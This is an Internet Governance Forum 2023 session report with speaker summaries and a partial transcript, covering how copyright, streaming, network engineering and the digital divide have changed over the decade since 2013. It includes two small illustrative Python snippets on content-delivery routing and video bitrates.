Liza Garcia                      | 162 words per minute | 1146 words    | 424 secs
Nick Benequista                  | 182 words per minute | 1841 words    | 607 secs
Sarah Opendi                     | 158 words per minute | 1895 words    | 720 secs

A Decade Later-Content creation, access to open information | IGF 2023 WS #108


Full session report

Online Moderator

Young producers in certain areas of the global South have successfully accessed the copyright framework, enabling them to develop professional content and enhance the value of intellectual property within their companies. This has allowed them to fund employee payment and content development. These young producers have mastered the necessary knowledge to support their activities in professional content production.

Local content creation in minority languages contributes significantly to cultural and linguistic diversity. Companies in Uganda, for example, create content in local languages that reflect people’s lives, ensuring representation and preventing the marginalisation or disappearance of these languages. It highlights the importance of using local languages for content creation to maintain cultural and linguistic diversity.

However, there is a significant disparity between broadband pricing and the spending power of local people. This issue arises when locals exhaust their data bundles before finishing a series, indicating a problem with supply and demand adequacy. Additionally, the quality and reliability of the signal pose challenges to accessing affordable and reliable broadband services. These factors limit digital access and create inequalities in internet access.

To address these challenges, it is necessary to continue deploying reliable infrastructure with a range of pricing options. This ensures digital inclusion and equitable access to affordable and reliable broadband services. Expanding the infrastructure and offering different pricing options help reduce the digital divide.

Content creators face the struggle of finding a sustainable model to continue their mission of educating and engaging people on various social issues. If creators fail to find buyers in the streaming environment, they may experience market failure, leading to potential loss of valuable content.

The entry of large American streamers into some markets has triggered competition, providing content creators with more opportunities for funding. Increased competition expands the market and offers content creators additional avenues for financial support. This positive development empowers creators to seek funding from a wider range of sources, leading to more diverse and varied content.

There is a belief in the potential of sustainable audiovisual production businesses at the SME level: local content creators can address different market segments based on local cultural and socioeconomic factors. This indicates the viability of building sustainable businesses in the audiovisual production industry, even at the SME level. By catering to specific local markets, content creators can create career tracks that align with the unique needs and interests of their target audience.

In conclusion, access to the copyright framework and the development of professional content allow young producers to build the value of intellectual property within their companies. Local content creation in minority languages contributes to cultural and linguistic diversity. The mismatch between broadband pricing and the spending power of local people hinders digital inclusion, and continued efforts are required to deploy reliable infrastructure with affordable pricing options. Content creators strive to find sustainable models to continue their impactful work, and the presence of large American streamers triggers competition, expanding funding opportunities. Building sustainable audiovisual production businesses at the SME level is seen as a promising avenue, offering the potential to address different market segments and create career tracks based on local cultural and socioeconomic factors.

LANTERI Paolo

The analysis of the arguments regarding copyright law and its impact on various industries reveals several key points. Firstly, copyright has adapted to technological advancements, allowing users unprecedented access to a wide range of content. Users now have the ability to access numerous fields of content, including music, sports events, user-generated content (UGC), and news. While not everything is perfect, copyright has successfully evolved to keep pace with technology.

Secondly, the content creator industry is in better shape than it was a decade ago. However, there are differences between sectors such as music, press, video games, and others. Despite these variations, the overall situation is more positive compared to ten years ago. The industry has experienced growth and improvement, suggesting that copyright protection has played a role in supporting the industry’s development.

Thirdly, copyright laws have evolved and become more flexible in recent years. Many countries, including the US, Australia, UK, South Africa, and Nigeria, have made significant changes to their copyright norms. These changes reflect a recognition of the need to update copyright legislation to accommodate technological advancements and address the challenges posed by the digital landscape.

Furthermore, copyright has proven its ability to serve diverse initiatives such as open access, open-source licensing, and user-generated content. This was seen as a challenge a decade ago, but it has now been demonstrated that copyright is flexible enough to support these initiatives. Platforms like TikTok, Meta, and Vista now enable legal user-generated content, despite disagreements over monetisation.

Another notable finding is that streaming, which was initially thought to destroy the music industry, now constitutes a significant part of the music market. In 2013, streaming was seen as a threat, but currently, 63% of the music market is digital. This highlights the transformative impact of streaming and its role in reshaping the music industry.

The analysis also suggests that the North-South debate in terms of content creation and cultural production is outdated. Countries in the Global South, including Brazil, Cuba, Indonesia, South Korea, and various African countries, are creating and exporting meaningful cultural and creative content. This challenges the traditional power dynamics of content production, showcasing the growth and diversity of creative industries in these regions.

Technology has played a crucial role in enabling access to local content, education, news, and serving the language diaspora. People can now easily access top-notch content produced in their home countries, facilitated by advancements in technology and content accessibility.

It is highlighted that maintaining copyright protection is critical to incentivise investment in professionally created content. Without copyright, the investments made in producing high-budget films, video games, and paying journalist salaries would be undermined.

Copyright laws are also shown to play a significant role in safeguarding the sports and gaming industry. As the industry has grown rapidly in the past decade, copyright laws have provided crucial control and protection for sports events, ensuring that the industry remains financially viable and sustainable.

Notably, there is a blurring demarcation between producer and distributor, with platforms like Netflix producing and distributing their own content. This blurring of roles raises important questions about the relationship between creators, distributors, and consumers in the digital era.

The analysis also reveals the importance of engineers in operationalising business deals and implementing technological advancements. Engineers are crucial in managing complex tasks such as revenue sharing and user identification, which are essential for the success of digital enterprises.

Additionally, the analysis highlights the need to protect youth creators and their works from being exploited without their consent or attribution. Copyright laws provide this protection, although effective enforcement relies on the use of appropriate technologies.

The analysis further demonstrates that user-generated content and derivative works are often covered and regulated by platforms’ terms of use. Platforms like TikTok, Instagram, and Meta have practices in place to address copyright concerns and ensure compliance with copyright laws.

Another insightful finding is that translation of literature requires permission from the author, as translation becomes a derivative work that can be commercially exploited. While some see translation as a financial opportunity, others emphasise its role in spreading knowledge and cultural exchange.

Regarding the issue of subscription fee stagnation versus increased content, it is highlighted that the current model may not be sustainable. Digital media services have been offering more content while keeping subscription fees similar for over a decade. This raises questions about the long-term viability of this business model.

In conclusion, the analysis demonstrates that copyright law has evolved and adapted to technological advancements. It has facilitated access to a wide range of content and has contributed to the growth and development of various industries. However, there are still challenges and areas for improvement. The findings highlight the need to continue updating copyright legislation, protecting the rights of creators, incentivising investment in professionally created content, and ensuring a fair and sustainable digital environment for all stakeholders.

Geoff Huston

In the last decade, the Internet has undergone a significant transformation driven by the evolution of mobile phones and their convenience. Mobile telephony has surpassed traditional telephony, and with the introduction of mobile Internet devices, such as the iPhone, the Internet has evolved from a library into a thriving entertainment business.

This transformation has resulted in a booming global market of internet users, with billions of people now connected to the Internet. The network infrastructure has been rebuilt using content distribution techniques, ensuring that content is readily available to users, making access to content more convenient than ever before.
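The “content distribution” rebuild described here is, at its core, about serving each request from the nearest available copy of the data rather than a single origin server. A minimal sketch of that idea follows; the server names, latency figures, and cached items are entirely hypothetical, chosen only to illustrate the selection logic.

```python
# Minimal sketch of the edge-caching idea behind content distribution
# networks (CDNs). All names and latency figures are illustrative.

ORIGIN = "origin.example.net"

# Hypothetical edge caches with measured round-trip times in milliseconds.
edges = {
    "edge-tokyo":  {"rtt_ms": 8,   "cache": {"movie.mp4"}},
    "edge-osaka":  {"rtt_ms": 15,  "cache": set()},
    "edge-sydney": {"rtt_ms": 110, "cache": {"movie.mp4"}},
}

def resolve(item: str) -> str:
    """Return the best server for `item`: the lowest-latency edge that
    already caches it, otherwise fall back to the origin."""
    hits = [(e["rtt_ms"], name) for name, e in edges.items() if item in e["cache"]]
    if hits:
        return min(hits)[1]  # lowest round-trip time wins
    return ORIGIN

print(resolve("movie.mp4"))  # nearest cache that holds the file
print(resolve("news.mp4"))   # cache miss, so served from the origin
```

Real CDNs make this decision with DNS steering, anycast routing, and cache-fill policies rather than a lookup table, but the principle is the same: bytes are delivered from close to the user.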

However, despite these advancements, the Internet has not evolved into the egalitarian platform initially envisioned for content creation. Instead of empowering individuals to become content publishers, the Internet has given rise to powerful intermediaries, such as Google and Akamai, who aggregate, license, and distribute content. These intermediaries dominate the industry by delivering uniform content to a global market.

The digital content industry is highly unpredictable and constantly reinvents itself every five years. Rapid technological advancements render business plans quickly outdated. This fluid environment poses both challenges and opportunities for businesses in this industry.

It is important to note that the Internet was built as a market response rather than a universal service. Unlike the telephone system, which prioritized universal service, the development of the Internet was driven by market demand. This approach has resulted in a focus on targeting higher-income consumers who are perceived as more lucrative for the tech industry.

However, there is hope for more universal access to the Internet in the future. Advancements in technology have made connectivity cheaper and more accessible, potentially enabling broader internet access. Initiatives such as Starlink, which aims to provide high-speed connectivity to remote areas, are helping to bridge the digital divide.

Other projects, like Project Kuiper, are also using space spectrum to provide internet coverage. These projects, combined with technological innovations, have the potential to improve internet coverage in rural and remote areas.

The digital industry offers the ability to customize and diversify products and services within a larger ecosystem. Unlike traditional industries like the auto and telephone industries, which scaled through uniformity, the digital industry allows for personalized offerings to individual markets.

In conclusion, the evolution of mobile phones and their convenience have transformed the Internet and expanded its user base. However, challenges remain in terms of content distribution and ensuring equal access for all. Technological advancements, initiatives like Starlink, and ongoing projects offer hope for bridging the digital divide and making the Internet more accessible to everyone. Additionally, the digital industry opens up opportunities for customization and diversity, creating a dynamic and fast-paced landscape.

Stella Anne Ming Hui Teoh

Device sharing has become a significant barrier to network access in Malaysia during the COVID-19 pandemic. Many households have been forced to share just one device due to limited resources, resulting in connectivity issues. Usage prioritisation within households further exacerbates the problem, as it determines who gets access to the device. This unfortunate circumstance has had a negative impact on individuals’ ability to stay connected and engaged during these challenging times. The situation has hindered SDG 4 (Quality Education) and SDG 10 (Reduced Inequalities).

In relation to copyright concerns, there is worry about the lack of recognition and credit for content created by young individuals and shared online. Original content created by youth often becomes part of larger programs through algorithms, but the creators may not receive appropriate credit for their work. These issues raise concerns about intellectual property rights and the fair treatment of young content creators, undermining SDG 10 (Reduced Inequalities) and SDG 8 (Decent Work and Economic Growth).

Japan’s influence on Southeast Asia’s copyright and intellectual property laws was discussed in neutral terms, but it is important to acknowledge the impact Japan has had in shaping these laws, particularly in relation to SDG 16 (Peace, Justice and Strong Institutions).

During the COVID-19 pandemic, an online presence has offered significant opportunities for connection. However, there is growing concern regarding unethical practices such as the translation and monetisation of someone else’s intellectual content by digital natives. Some individuals take advantage of the online space by appropriating intellectual work without official approval. This unethical translation and monetisation of others’ content raises discussions about plagiarism, improper crediting, and fairness in the digital world. These issues hinder SDG 8 (Decent Work and Economic Growth) and SDG 16 (Peace, Justice and Strong Institutions).

In conclusion, device sharing poses a major hurdle to network access in Malaysia during the COVID-19 pandemic. Concerns about copyright and credit for content created by young individuals have emerged. Japan’s influence on Southeast Asia’s copyright and intellectual property laws, while discussed in neutral terms, remains noteworthy. Additionally, unethical translation and monetisation of intellectual content by digital natives is a growing concern. Efforts are needed to address these issues, ensuring fair access to network resources, protecting intellectual property rights, and promoting ethical practices in the digital sphere.

Moderator

Over the past decade, the growth and success of internet video have been remarkable. Streaming services have become easily accessible, and live streaming has become possible, allowing people to share moments in real-time across great distances. This advancement in technology has made streaming video over the internet a common practice that can be done by anyone without needing permission or specialized equipment.

The management of IP rights has also witnessed significant progress over the past decade. Initially, there were concerns about how IP rights would be managed in the digital age. However, efficient and effective collaboration among stakeholders has led to improved IP rights management. Stakeholders, who initially had conflicts, have come together to ensure the proper management of IP rights, leading to a positive outcome.

Copyright laws have successfully evolved with the internet and have adapted well to the digital revolution. Many believed that copyright would not withstand the digital revolution, but it has proved its strength. Users now have unprecedented access to a wide range of content, and legislative reforms have taken place globally to adapt copyright to the digital landscape. Copyright laws have succeeded in incentivizing the creation of content and ensuring access to it. The copyright system has not only withstood the digital revolution but has also contributed to the growth of user-generated content, open access, and streaming.

The shift in content creation over the past decade has been drastic. Content is no longer a monolith, and everyone now has the ability to create content. The tools to create content have multiplied exponentially, including AI tools and augmented reality. This shift has resulted in a diverse range of content being produced and made available on the internet.

The relationship between the internet and copyright has been collaborative. Despite initial concerns and challenges, the internet and copyright have managed to coexist and maintain a healthy relationship. Both have found ways to adapt and work together, ensuring the protection of intellectual property while allowing for the free flow and accessibility of content.

Efforts to improve the internet for efficient content creation and consumption have been ongoing. Users now demand more interactive content, particularly video, which has led to the need for more efficient networks. The work on making the internet more efficient has been a priority in the past decade.

However, challenges still remain. The digital divide continues to exist, with developing nations lacking the necessary infrastructure for widespread and quality internet access. Internet connectivity is a critical aspect of content creation, and without robust infrastructure, the global South struggles to effectively create and upload content to the internet.

The industry has seen rapid transformation due to technological advances. The sports and gaming industries have gained a wider global audience. The video games industry in particular has experienced significant growth, with revenue projected to exceed 200 billion US dollars this year. The success of these industries is closely tied to intellectual property rights, and their business models have shifted from hardware-based products to online, global, interactive gaming.

Throughout the discussions, there was an emphasis on the role of first responders and engineers. Their contributions to the industry were highly appreciated, and there were calls to give them more recognition and appreciation. Moreover, there were discussions about the need for more resilient networks in the Global South to support content creation and ensure equal access to the internet.

In conclusion, over the past decade there have been significant advancements in internet video, IP rights management, and copyright laws. The shift in content creation has been remarkable, with the internet and copyright successfully coexisting and adapting to changes in the digital landscape. Efforts to make the internet more efficient for content creation and consumption have been ongoing, though challenges such as the digital divide and the need for better copyright protection remain. Technological advances have transformed the industry, and the sports and gaming industries have gained a wider global audience. The contributions of first responders and engineers were highly appreciated, and there were calls for more resilient networks in the Global South. Overall, the discussions highlighted the progress made across the industry and the importance of continued collaboration and innovation.

Konstantinos Komaitis

The relationship between the internet and copyright has proven to be healthy and adaptable, despite occasional disputes. Both entities have managed to coexist and adapt in the evolving environment. Despite initial concerns that the internet would harm copyright, it has been demonstrated that they can work together.

Content creation has become more accessible to everyone, thanks to technological advancements. Tools such as AI and augmented reality have opened up new possibilities for creators. User-generated content and influencer content are now integral parts of the copyright regime, which was once exclusive. This expansion of content creation has led to a more diverse and inclusive network.

Connectivity availability is a crucial factor in content creation. In order to create content, individuals need access to the internet. The increasing availability of smartphones has made it easier for more people to create content due to improved internet access. However, there is still a significant digital divide that needs to be addressed, particularly in the Global South. In order to foster more content creation in these regions, resilient networks and improved connectivity are necessary.

Industries and policymakers should take into account user demand and adapt accordingly. The evolution of technology and policy in the internet industry is largely driven by the demands and preferences of users. It is essential to listen to these demands and innovate accordingly to meet the needs of users. This user-centric approach contributes to the overall development and success of the internet industry.

The market will ultimately determine the survival of streaming services. Competition in the streaming industry is fierce, and the content offered plays a significant role in determining the success or failure of such services. Subscription service prices are also factors that influence the market. Some services may thrive and attract a large user base, while others may struggle to survive or even collapse quickly. The capacity to support the content being sold is another critical factor in the long-term sustainability of streaming services.

In conclusion, the relationship between the internet and copyright is dynamic. Despite occasional tensions, both entities have managed to coexist and adapt together. Technological advancements have made content creation more accessible, but connectivity still remains a challenge, particularly in the Global South. Taking into account user demand is crucial for industries and policymakers to stay relevant and meet the needs of users. Ultimately, the market will determine the survival of streaming services, with content and engineering playing a significant role in their success.

Glenn Deen

The internet has made significant advancements in handling video content over the past decade. Initially, there were only a few streaming services and video was primarily for thousands of viewers, not millions. However, as the demand for video content increased, more data was required. Today, video over the internet is commonplace and does not require special permissions or setups. Additionally, live streaming capabilities have allowed people to broadcast their experiences in real-time, opening up a new frontier in video over the internet.

While video on demand has made progress, live video over the internet still has room for growth. Examples of live broadcasting include sporting events or personal moments like a child’s soccer game. This indicates that there are opportunities for further development in this area.

The evolution of the internet has positively impacted the content creation and distribution industries. It has become a platform for next-generation streaming, with the quality of video evolving from standard definition to high definition and now 4K. Improvements in codecs and network transports have increased efficiency and reduced latency, providing a better user experience.
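The jump from SD to HD to 4K, and the codec improvements that offset it, can be made concrete with a back-of-envelope calculation. The bitrates below are rough illustrative figures, not measurements from any particular service or codec release:

```python
# Back-of-envelope illustration of how resolution and codec choice drive
# data volume for a 2-hour film. Bitrates (Mbit/s) are rough, illustrative
# figures, not measured values from any real service.

typical_bitrate_mbps = {
    ("SD", "older codec"): 2.5,
    ("HD", "older codec"): 5.0,
    ("4K", "older codec"): 32.0,  # hypothetical: 4K without codec gains
    ("4K", "newer codec"): 16.0,  # newer codecs roughly halve the bitrate
}

def gigabytes(bitrate_mbps: float, hours: float) -> float:
    """Total transfer in GB for a stream at `bitrate_mbps` lasting `hours`."""
    seconds = hours * 3600
    megabits = bitrate_mbps * seconds
    return megabits / 8 / 1000  # Mbit -> MB -> GB

for (res, codec), mbps in typical_bitrate_mbps.items():
    print(f"{res} ({codec}): {gigabytes(mbps, 2):.1f} GB per 2-hour film")
```

The arithmetic shows why codec efficiency matters as much as raw capacity: halving the bitrate of a 4K stream saves more absolute data per viewer than an entire HD stream consumes.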

Efforts have been made to bridge the North-South divide in internet infrastructure, but more improvement is needed. The internet has been re-engineered to scale inclusively and allow diverse interactions for content creators.

The continuous evolution of internet technologies presents exciting opportunities and challenges. While investments in these technologies have resolved previously feared problems, new challenges such as latency have emerged. However, innovation in IP networks and frameworks has allowed businesses to thrive and adapt.

The user base of the internet has expanded, shifting from primarily computer scientists to a wider spectrum of creators, viewers, and market participants. This evolution has changed who the internet is designed for and has led to market frameworks that encourage exchange and payment for content.

The internet has made content creation more accessible and affordable. New tools, such as smartphone applications, have allowed for cinematic-quality video capture and processing, eliminating the need for expensive professional equipment.

Glenn Deen, one of the trustees managing the copyrights on all technical standards produced by the IETF, highlights pre-enabled translation permissions for IETF standards. This supports the translation of, and free access to, informational resources, aligning with the goals of quality education and reduced inequalities.

Overall, the internet has successfully scaled to handle video content and has positively impacted various industries. While live video broadcasting still has room to grow, the evolution of internet technologies presents both opportunities and challenges. The user base has expanded, and market frameworks have emerged for content exchange and payment. Additionally, the internet has made content creation more accessible and innovations have facilitated the translation and free access to informational resources.

Audience

The discussions centred around different aspects of internet and technology, emphasising the importance of considering users’ needs and desires when improving these areas. One major concern highlighted was the lack of access to high-quality connectivity, especially in underserved areas. It was noted that approximately 2.6 billion people are still without internet access and meaningful connectivity, which highlights the existence of a digital divide that needs to be addressed.

Mobile technologies, particularly smartphones, were identified as crucial devices for rural communities to access digital content and resources. In Kyrgyzstan, for example, while there is limited access to computers, almost everyone uses smartphones. As a result, smartphone-friendly content, such as adjustable-font textbooks and lightweight videos, has been developed specifically for these communities, enabling them to access valuable information and educational materials.

The significance of localised content in the Kyrgyz language was also emphasised as an important factor in enhancing content accessibility and user-friendliness. Local stars were mentioned for voicing translated science materials, making them more user-friendly than the original versions. Prioritising the Kyrgyz language in content creation is essential for tailoring resources to the needs of the local community.

Copyright restrictions were identified as a major obstacle to digitising and sharing educational resources, particularly in Kyrgyzstan. Although the Ministry of Education has paid for the textbooks, the copyright remains with the authors. These restrictions have prevented the digitisation of existing textbooks for digital distribution, hindering the widespread dissemination of educational materials.

However, the use of Creative Commons materials was recognised as a helpful workaround where copyrighted content could not be shared. It proved easier to find openly licensed Creative Commons materials that could be translated into the Kyrgyz language. These materials were sourced from globally available resources such as GSMA’s toolkit and Microsoft’s materials, enabling the creation of accessible and valuable content.

The impact of technology on content creation and consumption was deemed an important issue. The shift from the traditional library model of the internet to an entertainment model was discussed, highlighting the rapid technological advancements that consistently reshape the landscape every three to five years. The role of user-generated content and open-source platforms in shaping the market positively was also emphasised. However, concerns were raised about the cannibalisation of editorial intermediaries by platform intermediaries, prompting further examination of these dynamics.

One participant in the discussions questioned whether there is a failure in democracy rather than the market in relation to platform intermediaries. The critical role of platform intermediaries was stressed, along with speculation that these platforms may be contributing to the creation of social monads, potentially impacting societal dynamics.

The discussions also raised questions from the audience. One question addressed copyright rules on Instagram when uploading personal audio tracks to reels, indicating a concern about copyright infringement on social media platforms. Another question raised the issue of educating youth about copyright best practices, highlighting the need for efforts to raise awareness and promote responsible behaviours regarding intellectual property rights.

In conclusion, the discussions provided valuable insights into the challenges and opportunities related to internet and technology. Addressing the needs and desires of users, particularly in underserved areas, is crucial for improvement. The importance of mobile technologies and localised content in enhancing accessibility and user-friendliness was emphasised. Copyright restrictions posed obstacles to digitising and sharing educational resources, necessitating alternative solutions such as Creative Commons materials. The impact of technology on content creation and consumption, including concerns about platform intermediaries, democracy, content quality, and economic sustainability, called for further examination. Overall, the discussions shed light on the complexities and multifaceted nature of internet and technology-related issues.

Session transcript

Moderator:
Yep. Okay. All right. No. All right. We’ll just get started and we’ll have people join as they can, realizing we’re dealing with a global interest. Good morning, everybody. Thank you for joining our panel this morning. This is a discussion we had 10 years ago at the IGF in Bali in 2013. I’m really excited to have it today, because there’s so much that has happened, and a lot of it we didn’t predict, but yet the Internet was happy to take on all the new excitement of the next 10 years that we had from 2013 to 2023, and we’re going to discuss how we’re going to manage it going forward. So the key questions we’re going to discuss today are where were we 10 years ago, where are we now, and where are we headed, and how is the forward planning that brought us into the healthy, vibrant ecosystem that we are currently enjoying going to bring us forward on this? So today on my panel, I have next to me Glenn Deen, who is a distinguished engineer at Comcast NBCUniversal, Paolo Lanteri, who is at the World Intellectual Property Organization, and I’ve got Konstantinos, who is a nonresident fellow at the Atlantic Council and was a senior director at the Internet Society, and Geoff Huston is on… You can correct that if you need to. Geoff Huston, the chief scientist at APNIC, should be online joining us, and then eventually we’re going to come over to Stella over here, who is studying governance and policy and is with netmission.asia. So thank you all for joining us this morning. Let’s start off… Glenn, we’re going to start with you. So what have we learned in the past 10 years, and what do you think are the dominant issues that really helped the Internet and the network infrastructure grow in that 10 years?

Glenn Deen:
Thanks, Shane. Gee, that’s an interesting question. You know, 10 years ago when we did the Bali panel, it was really early days in terms of Internet video. We had… Some streaming services were popping up. We had sort of the initial foray into scaling the Internet to handle content with millions of viewers instead of thousands of viewers, and I think that looking back, we met those challenges pretty effectively. You know, despite dressing up today trying to blend in with the adults here at the IGF, I am an Internet engineer, and from an engineering perspective, we had a lot of challenges back then. Video takes a lot of data. Video is a lot of data, and as you add more video, you have even more data on the network, and as you add more video, you add more watchers, and that’s even more data on the network, and we’ve scaled the networks very effectively in the last 10 years to the point where we don’t really ask the question, can I do video over the Internet anymore? We don’t ask the question, can we do video easily between us? I can now walk down the street here in Kyoto, and I can live stream back to my family in Los Angeles. That’s remarkable that I can do that over the Internet, and I don’t have to ask anybody’s permission, and I don’t have to jump through a bunch of hoops, or I don’t need a crew to do it. I just use my phone, and that’s quite remarkable, so I think that looking back from where we were at 10 years ago to where we’re at today, it’s a success story from an engineering standpoint. That’s my area. That’s who I can talk to. We’ve succeeded. We’re not done. There’s new stuff ahead. 
One of the big changes that we’re going to be talking about, and I’ll talk about this a little bit later, is we’ve done a very great job at video on demand, which is typically prerecorded movies and television shows from a professional standpoint, and the next frontier is live stuff, live sporting events, live broadcasting your child’s soccer game to your grandparents who are at home in maybe another state or another country, and bringing live to the experience of streaming and video on the Internet, but we’ll talk about more of that in a few minutes, I think.

Moderator:
Great. Paolo, you have been working in this space for quite some time, and there was a lot of concern about how IP rights were going to get managed back then. It just seems like you have done a very efficient, effective job of getting the collaboration of a lot of people who didn’t want to get along 10 years ago. Talk about your success.

LANTERI Paolo:
Thanks. Thanks a lot. Good morning, everyone. I rarely start my intervention with an apology, but given the context, I must do that. On top of being an international civil servant, I’m a lawyer, an IP lawyer, so I try to keep myself understandable, and I’m heavily jet lagged, and it’s 8.35 in Japan. You do that to handicap the lawyers. So the situation 10 years ago was a completely different one. We were very cautious, and the best we could get out of that discussion was that copyright was still relevant for promoting content, but needed to adapt. To put it in other words, it was evolve or perish, basically. And among many people at the IGF, secretly or sometimes openly, I think the majority were sort of leaning towards the second option, like they were thinking that copyright was not going to resist the technological evolution, or in any case could not stand through the evolution of the Internet. I think 10 years later, we can all agree at least on two points. We’re not saying everything is perfect, but copyright didn’t perish, it’s still here, and users have had unprecedented access to the widest variety of content in all sorts of fields, meaning even live music and sports events, UGC, news, fake or quality news, anything. So basically that’s already an answer: copyright didn’t stand in the way of the healthy development of the distribution of content. I’m not saying everything is perfect, there are still many challenges, but copyright succeeded in delivering, and continues to deliver, the mission of incentivizing the creation of content, and therefore access to it, and went through this almost Darwinian natural selection process, I think matured from many lessons learned, but also came out stronger and reinforced, because the content creator industry is in much better shape compared to 10 years ago. 
Here I must make a disclaimer that not all industries are the same, so it’s not the same talking to the music industry as to the press industry, or publishing, or video games, of course, and within those sectors there are different players, so again, it’s not the same talking to a music producer as to a session musician. How did we do that? Of course there was a development, an evolution that was much needed; it happened, it was revolutionary, and covered several aspects. One, from a norm-setting perspective, we had unprecedented changes in the norms, in legislation; nothing similar happened in the past. Copyright reforms were on the table of legislators all over the world, and still are, a headache for legislators. Countless directives at the European level, the Music Modernization Act in the US, Australia and the UK discussing one, South Africa, Nigeria just implemented one, Uruguay yesterday, countless everywhere. So the system had to evolve and is evolving, but the most extraordinary changes I think are in the way copyright is exercised and licensed: stakeholders sat down at the table and found a way to make things that were unworkable finally workable. I won’t dig into details now, but I’m happy to do it later. There are many success stories, three very much related to what was discussed ten years ago. One is open access, open source, open licensing and all that; I think it’s almost a settled issue. Back then we were saying copyright is not fit for purpose, because there are so many open, crowd initiatives going on, and IP is not serving those purposes. That was not the case, and is not the case, because actually it’s flexible enough to make it happen, plus limitations and exceptions. I’m happy to develop on that. User-generated content: literally one of the outcomes of the 2014 IGF was that UGC is a non-resolvable issue, showcasing how copyright and reality are completely displaced and mismatched. Why? 
Because for any one of us, taking a video and synchronising a song, or modifying a picture found on the internet, entails a number of exclusive copyright rights, so you need to ask permission to do that, individually. Back then it was individual: you want a piece of music on your video, you need to go and knock on the door of the producer to get that. Similarly, you get a picture online, you need to ask permission to use it. So we were saying it’s not going to work, and rights holders were saying yeah, but you cannot do that. Ten years on, we have TikTok, we have Meta, we have Vista, we have countless UGC services that are legal, and we can discuss, people are unhappy about how much money they’re getting, but that’s another issue, a business bargaining-power discussion. So copyright showed it can be adapted. The other great success story is streaming, but I would need at least half an hour for that. Streaming in 2013 was like, wow, it’s going to destroy the music industry, this cannot happen; and now the music industry is built up on it. I think over 63% of the music market is digital these days, and of course not everyone is equally happy, but things are working well for everyone, users and stakeholders. So I think those are the success stories, and we can discuss more about the details of those changes and what’s next.

Moderator:
Thank you. We’ll probably come back to several of those issues. Konstantinos, you were on a panel yesterday that was talking about fragmentation, and I thought about it, and this came up as well: some people’s fragmentation is actually just a distributed network, it depends on where you sit and where you’re thinking about this. So in the ten years that we have been discussing this since 2013, how are the distribution networks faring, and are we getting into more challenges with governments because of what we just heard about all this new content, or are the networks not affected by the fact that we just have lots of content and it’s making it to where people want it to go?

Konstantinos Komaitis:
Hi everyone, and thanks for having me here. Just a small correction, I am no longer with the Internet Society, so just to make sure that this is on the record. So, I think that over the past ten years there have been a lot of lessons learned. I remember when I started ten years ago at the Internet Society, funny enough, I was hired to do copyright, and I was hearing strong voices claiming that we needed to kill the Internet because it was going to kill copyright, and of course this didn’t happen. Paolo is absolutely right: both copyright and the Internet found a way to collaborate, right? They found a way to coexist in a system, or better yet an environment, that is evolving so fast and changing so fast. And I was having a conversation with Glenn this morning, and we were talking about, could we have predicted the TikToks, or the user-generated content that exploded, or the streaming services, and if we had predicted that, what we would have done. And we both concluded that it’s actually really good that we didn’t predict it, because it demonstrates both the flexibility of copyright, as Paolo said, and also the ability of the Internet to bring us new challenges all the time, and to adapt to those challenges. I think that what we’re seeing currently, and what is really fascinating for me, is that the way content is created has exploded, right? Content creation is no longer a monolith. In the old days, you had very specific actors that were creating content, and they were very much responsible for the distribution of this content, but right now, literally everyone is creating content, and the tools that allow you to create content have multiplied exponentially. 
So, AI tools, augmented reality; you have influencers that are creating content and claiming copyright; you have all these different services that allow you to be part of this copyright regime that was so very much exclusive before the Internet and in the early days of the Internet. Now, I think that networks had to adjust to that reality, and they had to figure out how to cope with exactly what Glenn said in the beginning. Video. Because that is where we are right now in terms of the Internet from a user perspective. Users want to stream. Users want to watch video. Users want to have access to content that is as interactive as possible, right? And I think that this is going to accelerate as the new tools are coming in. So there is a very, very valid question. Glenn and I met ten years ago, practically, and ten years ago he was telling me, I am working to make networks better and more efficient. So I saw him this morning, and I said, oh, what are you working on these days? Literally, he said what he was working on ten years ago. In the beginning, I was like, hmm, but then you realise that this is exactly what we need to be working on, right? How to make the Internet more efficient for users to create and consume video. Sorry, content, because not everybody wants to create content, but there is a lot of consumption. So I think we are at a very interesting place where, I have to admit, and I never thought that I would say this: if copyright and the Internet were in a relationship, in the beginning they were not really getting along; right now, they have sort of figured it out. They have their tensions, they have their marital problems, but they’re not divorced, which, for me, is a really, really healthy place to be in many different ways.

Moderator:
So we have a healthy relationship that is continuing to blossom. We were going to go to Geoff, did you need to get in there? Are you having an intervention already?

Glenn Deen:
Do I need to update my job description as marriage counselor?

Moderator:
Yes, perhaps. Perhaps, all right. That was a great interaction. Do we have Geoff online? Yes, yes, you do. Okay, fabulous. All right. Thank you for joining us today, Geoff. Sorry we’re not having you here in person. So you join the gentlemen here. How are we doing technically? Has it survived as well as it feels like to the common user? It seems like the technical aspects of the Internet have just flourished, and you guys have been doing an amazing job on the back end, making sure all this content gets delivered to where it wants to go.

Geoff Huston:
Over the last 10 years, oddly enough, I think we’ve rebuilt the Internet completely. It’s not what it was 10 years ago, and it’s certainly not what it was 20 years ago. The transformative technology, oddly enough, was the evolution of mobile phones. Mobile telephony, after a very torrid start, took over telephony. The sheer convenience of having it in your pocket all the time transformed that industry. And when that industry then turned, with the initial offering of the iPhone, and then everybody had a mobile Internet device, it completely transformed the Internet. Because all of a sudden, this wasn’t the library anymore. We weren’t curating data. These weren’t institutions of knowledge. We’d become an entertainment business. And our population wasn’t just a few million. All of a sudden, we were looking at a global market of billions, billions. Now, with that massive expansion, the mobile industry certainly coped in giving everyone cheap Internet devices. And the content industry was under extraordinary pressure. I suppose the prize motivated the money available to create entertainment across that platform. Now, a long time ago, 15 years, the network was used to get users to the services they wanted to find. It was like a road system: where are you going? Let me take you there. But you can’t scale that, it’s too hard. And so under the enormous pressure of volume, of scale and money, we rebuilt the Internet completely. And it’s just as well Moore’s Law came and helped us. These days, computing is just prolific. Supercomputers on your wrist are just what we wear. Storage is abundant like crazy. Terabytes of information on your phone; this is insane. And of course, what we’re also finding is carriage is now cheap. We talk about moving terabits per second of information on fiber optic cables as if it was commonplace, and it is. That combination has changed the network. Instead of going to find your content, content comes to your door. 
